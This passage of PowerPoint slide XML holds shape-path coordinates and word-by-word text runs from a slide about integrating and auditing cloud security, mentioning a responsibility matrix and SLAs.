                    <a:pt x="140239" y="58837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142747" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184403" y="88518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295655" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405256" y="110998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513206" y="130175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619125" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723138" y="184276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824864" y="218693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924178" y="257937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021206" y="301751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115694" y="350138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207389" y="402970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296162" y="459866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382140" y="520953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464817" y="585977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544319" y="654812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620392" y="727455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692909" y="803528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761616" y="882903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826640" y="965707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887727" y="1051560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944751" y="1140460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="1232153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="1326641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="1423669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="1523111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="1624964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="1728851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217166" y="1834768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="1942591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2052319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2163444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2261616" y="2276220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2388869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2499994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="2609469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217039" y="2717291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="2823210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="2926969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="3028696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="3128010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="3225038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="3319399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944877" y="3411092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887981" y="3499866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826894" y="3585717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761997" y="3668395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693290" y="3747770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620774" y="3823842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544827" y="3896359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465452" y="3965321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382776" y="4030217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297051" y="4091304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208277" y="4148201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116710" y="4201033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022350" y="4249420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925449" y="4293234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007" y="4332478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724407" y="4367022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620521" y="4396613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514730" y="4421124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407034" y="4440555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297433" y="4454525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186308" y="4463161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188467" y="4491608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300989" y="4482846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411988" y="4468622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521080" y="4448937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628395" y="4424172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733551" y="4394073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836549" y="4359148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937132" y="4319270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035303" y="4274820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130934" y="4225798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223771" y="4172330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313560" y="4114546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400428" y="4052697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484121" y="3986783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564513" y="3917060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641475" y="3843654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714880" y="3766566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1784477" y="3686048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850135" y="3602228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911984" y="3515359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969642" y="3425316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022855" y="3332353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071751" y="3236848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116201" y="3138551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155825" y="3037840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190622" y="2934842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220467" y="2829560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245232" y="2722245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264664" y="2613152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278760" y="2502154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2389504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290064" y="2275458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2161286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278633" y="2048637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264409" y="1937639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244979" y="1828418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220087" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190368" y="1615693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155443" y="1512569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115566" y="1411858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071242" y="1313561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022220" y="1217929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968753" y="1125092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911095" y="1035050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849119" y="948054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783206" y="864235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713483" y="783843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640077" y="706754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562989" y="633222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482470" y="563499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398651" y="497713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311655" y="435863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221613" y="378205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128649" y="324738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033017" y="275716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934719" y="231393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833881" y="191515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730884" y="156844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625475" y="126873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518159" y="102107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408939" y="82676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297814" y="68452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185165" y="59943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="73151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45237" y="4891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="19605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6268" y="41915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="69595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4891" y="97492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19605" y="120554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41915" y="136425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69595" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97492" y="137856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120554" y="123142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136425" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137856" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123142" y="22145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100832" y="6268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73151" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="71754" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142747" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="139943" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="5715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290822" y="3544061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75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290822" y="3544061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290822" y="7248905"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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290822" y="7248905"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229362"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362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202174" y="462762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202174" y="462762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183886" y="6145529"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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17BE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183886" y="6145529"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229362"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362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3208401" y="1756298"/>
            <a:ext cx="10469880" cy="3406775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="188595" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="76200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1485"/>
              </a:spcBef>
            </a:pP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Cloud-based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services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help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obtaining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integrating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cloud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security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data.</a:t>
            </a:r>
            <a:endParaRPr sz="2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Following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features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help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achieving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cloud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security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integration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auditing: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000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2092325" marR="115570">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Responsibility</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>matrix</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484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14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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>SLAs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>provides</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484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3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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
